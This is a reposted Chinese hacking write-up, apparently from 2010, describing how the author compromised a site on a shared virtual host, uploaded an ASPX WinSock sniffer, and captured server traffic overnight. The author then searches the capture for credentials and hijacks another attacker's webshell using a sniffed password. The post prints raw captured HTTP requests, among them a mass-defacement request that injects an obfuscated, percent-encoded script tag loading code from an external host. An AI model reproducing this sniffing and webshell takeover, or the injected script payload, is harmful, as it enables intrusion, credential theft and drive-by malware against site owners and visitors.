當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

WinSock嗅探虚拟主机拿站取webshell

發布時間：2024/4/11 编程问答 30 豆豆

生活随笔收集整理的這篇文章主要介紹了 WinSock嗅探虚拟主机拿站取webshell 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

來源：本站轉載作者：佚名時間：2010-08-08TAG： 我要投稿

感覺這些夠無聊的，沒點新意不說，好像還覺得有點白癡 - - 所以文章我本來就沒打算寫。不過既然有人幫我寫了，我就發出來吧。其實我拿到虛擬主機管理員密碼的步驟是。。。。。。
PS:這工具過幾天在本文里放出呵。因為最近考試，博客七月前不更新了，七月放假了我在回來完善博客程序
過程是我搞的，但是當時我沒截圖，所以小酷同學整理出來的這個文章時間就有點對不上，不過確實是這么個步驟
首先是嗅探工具，asp的虛擬一般都支持aspx（少數不支持的忽略哈），那么用C#調用winsock嗅探下80端口、順便連ftp和SMTP端口一起監聽了吧。
第一步，隨便旁注拿下asp虛擬主機上的一個網站，上傳aspx的工具（工具我會隨后發上來的）如圖：

這個虛擬主機還算不錯，才三分鐘，就Packets: 260這么多包了
一個通宵抓包，好了，該分析日志了。
日志下載下來，因為虛擬主機，監聽的是整個服務器，信息量太大，只能有選擇的分析，搜索admin、pass、user、login等等有選擇的看包。
從抓包中發現，很多人在暴力猜解ftp密碼。。。暈，這是何苦呢
搜索admin這一關鍵詞時有這么一個部分引起了我的注意，如圖：

目錄是admin下的文件，而且還有Cookie。。。很明顯。呵呵
再看往下：
POST: /Admin/sent.asp HTTP/1.1

Via: 1.0 PROXY

Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG

Referer: http://www.xxx.com/Admin/sent.asp

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Host: www.xxx.com

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Accept-Language: zh-cn

UA-CPU: x86

Pragma: no-cache

Connection: Keep-Alive

Content-Length: 13

pass=buqiuren

慢慢來看，無關的跳過了哈

POST: /Admin/sent.asp

發送指令到admin目錄的sent.asp

Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG

這個不用解釋了吧，用session，session似乎不能像Cookie那樣欺騙，能我也不會

Referer: http://www.xxx.com/Admin/sent.asp

完整的url估計就是這個不錯了，打開看看。居然是webshell
這下就更省事了

?好了，繼續往下看：

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

反正不是我機器上的
下面的越看越無聊，直接跳到最后：

pass=buqiuren

輸入密碼：buqiuren即可登錄

下面就是批量清馬，清理找webshell了
PS：做人要積德，掛馬盜號這樣的無德無良的事情最好不要干，修復漏洞，留張條就行了。罪過啊罪過
look，掛馬的信息也抓出來了。。。。好無聊

POST /Admin/sent.asp?Action=plgm&code=<script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46></script> HTTP/1.1

Via: 1.0 PROXY

Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG

Referer: http://www.xxx.com/Admin/sent.asp?Action=plgm&code=<script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46></script>

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Host: www.xxx.com

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Accept-Language: zh-cn

UA-CPU: x86

Pragma: no-cache

Connection: Keep-Alive

Content-Length: 153

總結

以上是生活随笔為你收集整理的WinSock嗅探虚拟主机拿站取webshell的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。